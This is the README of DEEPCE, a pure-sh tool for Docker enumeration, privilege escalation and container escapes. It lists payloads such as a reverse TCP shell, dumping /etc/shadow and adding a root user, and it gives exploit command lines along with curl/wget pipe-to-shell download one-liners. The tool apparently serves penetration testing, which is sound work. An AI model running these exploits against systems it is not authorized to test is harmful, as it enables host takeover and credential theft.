deepce
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/ __ / _ \/ _ \/ __ \/ ___/ _ \ ENUMERATE
/ /_/ / __/ __/ /_/ / (__/ __/ ESCALATE
\__,_/\___/\___/ .___/\___/\___/ ESCAPE
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Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
In order for it to be compatible with the maximum number of containers DEEPCE is written in pure sh
with no dependencies. It will make use of additional tools such as curl, nmap, nslookup and dig if available but for the most part is not reliant upon them for enumeration.
None of the enumeration should touch the disk, however most of the exploits create new containers which will cause disk writes, and some exploits will overwrite runC which can be destructive, so be careful!
Please see below for a list of the enumerations, exploits and payloads DEEPCE can use. If you have ideas for anymore please submit an issue in github!
Downloading
DEEPCE can be downloaded onto a host or container using one of the following one-liners. Tip: download to /dev/shm
to avoid touching the disk.
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh
Screenshots
For more please view the docs folder
Enumerations
The following is the list of enumerations performed by DEEPCE.
- Container ID & name (via reverse dns)
- Container IP / DNS Server
- Docker Version
- Interesting mounts
- Passwords in common files
- Environment variables
- Password hashes
- Common sensitive files stored in containers
- Other containers on same network
- Port scan other containers, and the host machine itself
- Find exposed docker sock
Exploits
- Docker Group Privilege Escalation
- Privileged mode host command execution
- Exposed Docker Sock
Payloads
For each of the exploits above payloads can be defined in order to exploit the host system. These include:
- Reverse TCP shell
- Print /etc/shadow
- Add new root user
- Run custom commands
- Run custom payload binaries
Examples
# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh
Exploits
The following examples show the different kinds of exploits that can be performed and the avaliable payloads.
- Exploit a privileged container to create a new root user on the host operating system:
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
- Exploit a writable docker sock file in order to print the contents of
/etc/shadow
./deepce.sh --no-enumeration --exploit SOCK --shadow
- Escalate to root via membership to the docker group on a host and run a custom payload
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"
Advanced Usage
It is possible to download and run deepce without touching the disk, however you will be unable to easily set arguments (direct manipulation of variables is possible using export).
wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
Inspiration
There are some great container enumeration/escape scripts and enumeration tools that I've got inspiration from when writing this. However I felt the need to write one purely in sh
in order to avoid having to install go / ruby dependencies or be reliant on a static binary. I also wanted to be able to perform more enumerations to try to discover what the docker container is as during as test we may end up inside an unknown container. The number of things this script can enumerate got away from me as every time I added something new I thought of more additional things I could add.
Resources
Developers looking for Docker security tips https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md
Contributing
I welcome pull requests, issues and feedback.
- Fork it
- Create your feature branch (git checkout -b my-new-feature)
- Commit your changes (git commit -am 'Added some feature')
- Push to the branch (git push origin my-new-feature)
- Create new Pull Request